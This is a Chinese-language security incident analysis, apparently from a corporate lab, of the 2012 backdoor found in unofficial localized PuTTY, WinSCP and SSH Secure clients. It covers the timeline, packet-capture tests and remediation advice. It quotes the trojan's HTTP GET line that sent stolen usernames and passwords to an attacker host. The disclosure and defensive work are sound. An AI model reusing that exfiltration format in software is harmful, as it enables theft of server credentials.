针对Putty等汉化版软件后门事件的实验分析

    项目组在2012年1月底在微博上发现了常见客户端软件的一个紧急的安全威胁，而我公司可能有大量运维人员使用此软件，签于此，我们开展了针对此问题的实验分析，并给出了相关建议。

1 事件背景
    网络运维人员在进行设备维护时，通常使用客户端程序远程登录到被管系统上进行，常见客户端程序有Putty、SshSecure、WinSCP、SecureCRT等；登录方式包括Telnet或SSH；被管对象涉及到路由器、交换机、服务器（如操作系统、数据库等）等各类网络设备和系统。在各种远程登录工具中，Putty是 出色的工具之一。

2 事件起因
    Putty没有官方中文版，最近有Linux服务器管理员发现，Putty工具的非官方“汉化版”疑似内置后门。部分网站和企业服务器已因此遭到黑客攻击，导致系统root密码泄漏以及资料泄漏。
1月25日，新浪微博有网友发布消息称putty和winscp中装有后门程序，但该条微博并未提及后门程序的类型及其技术细节，而且消息也未被过多的人所重视。
    1月30日下午16点左右，互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息，并且此消息对后门的行为特征进行了简要的描述，该程序会导致root密码丢失，但发布者仍未披露具体的技术细节。
    1月31日，经过一晚的酝酿，putty事件开始在互联网上广泛传播，微博、论坛等信息发布平台上开始大量出现putty后门事件的消息，同时，很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析，并陆续发布其中的技术细节。
    很快，有网友在微博暴料称，目前已有上万服务器遭PuTTY后门窃取密码，据某公司安全小组的分析报告称，已有完整的受害者列表供所有用户浏览和下载，包括众多政府网站和IBM、Oracle、HP等大厂商的服务器也出现在列表内。
3 事件分析
     针对此事件，我们进行了完整的跟踪和分析，攻击事件完整分析过程如下：

    3.1 木马制作
    1月25日或更早，攻击者制作了Linux/Unix服务器的系统账号盗号木马，并捆绑在putty、winscp和sshSecure汉化版软件中。随后，攻击者将捆绑木马的汉化版软件挂在www.putty.org.cn、www.winscp.cc 和www.sshsecure.com 网站上供用户免费下载。当用户使用该软件进行远程设备运维操作时，内嵌木马会盗取盗取用户的root密码，并以http的get方式自动发送到lip-163.com中保存，发送数据格式为：
GET/yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTYHTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache
    并且木马获取账户口令后会实时发送，不会先保存后延迟发送，以下为测试过程：
    1）搭建测试环境，使用带有后门的putty客户端对服务器进行远程登录，并确保维护终端可以访问互联网，同时在维护终端上打开抓包软件。在使用root：root登录被管理服务器后，捕获的数据包如下所示：
    实验结果：说明木马将账户口令信息实时发送至l.ip-163.com，需要说明的是木马会记录所有登录的账户信息，不仅仅只记录root的口令信息。
    2）接下来，断开putty维护终端与互联网的连接，重复步骤a。从抓包软件捕获的数据库包中未发现发送账户口令相关信息（由于已经断网，DNS无法解析l.ip-163.com的ip，因此无法建立TCP连接）。
实验结果：说明维护终端不连接互联网时，账号信息无法实时泄露出去。
    3）5分钟后，使putty维护终端连接互联网，同时在该维护终端上始终开启抓包分析。经过持续30分钟的分析，未发现主动向外发送账户口令的行为。

    3.2 木马推广和传播
    黑客组织将这三个网站（ www.putty.org.cn、 www.winscp.cc 和www.sshsecure.com ）在百度中进行推广，用户搜索时，使这些带有黑客后门的软件的网站排名靠前，扩大推广范围。
     3.3 大量用户中招
     攻击者在putty、winscp和sshSecure等软件中安置好了后门，并在搜索引擎中大肆推广，随着大量用户下载并使用该软件，导致大量服务器root密码信息被黑客组织收集，包括IBM、HP以及sourceforge等知名企业的服务器口令。
   
    3.4 Root密码被扩散
    在这次事件中，黑客组织收集存放密码的服务器ip-163.com被另一方黑客攻陷，导致大量密码被扩散。以下是关于Putty事件汉化版后门事件受影响的IP地址示例：
    3.5 百度取消木马网站的竞价排名和黑客服务器下线
    putty等后门事件曝光后，百度取消了www.putty.org.cn、 www.winscp.cc 和www.sshsecure.com网站的竞价排名。黑客服务器也已下线 ，黑客组织当前已将www.putty.org.cn、www.winscp.cc、www.sshsecure.com 和ip-163.com网站下线，但仍有大量已被捆绑木马的客户端软件仍被大量使用，大量用户Root账号被发送到ip-163.com。

4 修复建议
     经过对此次事件进行完整的研究和分析后，建议曾经使用过汉化版软件的用户尽快采取以下措施：
     1）使用最新规则库的杀毒软件对putty、winscp和sshSecure进行安全查杀，确保当前使用的版本未被捆绑木马；并建议立即修改服务器的账号口令，并对服务器进行后门查杀；
经测试，360杀毒软件（程序版本：v3.0.0.2121，病毒库日期：2月3日）和金山毒霸（主程序版本：v2012.sp2.1.020309，病毒库版本：2012.02.03.09）能检测出Putty客户端软件中是否被植入木马。测试过程截图如下 ：
    2）对于从上述三个网站下载过中文版软件的用户，Root密码极有可能已被泄露，建议立即修改服务器的账号口令，并对服务器进行后门查杀；同时在服务器上设置访问控制策略，只允许可信IP对该服务器进行远程管理；
    3）若有其他不确定的问题，可及时联系我们协助支持；
    4）今后使用相关软件时，建议到官方指定网站下载和安装：
     http://www.putty.org/
     http://winscp.net/eng/docs/lang:chs


权限：公开   来自：labs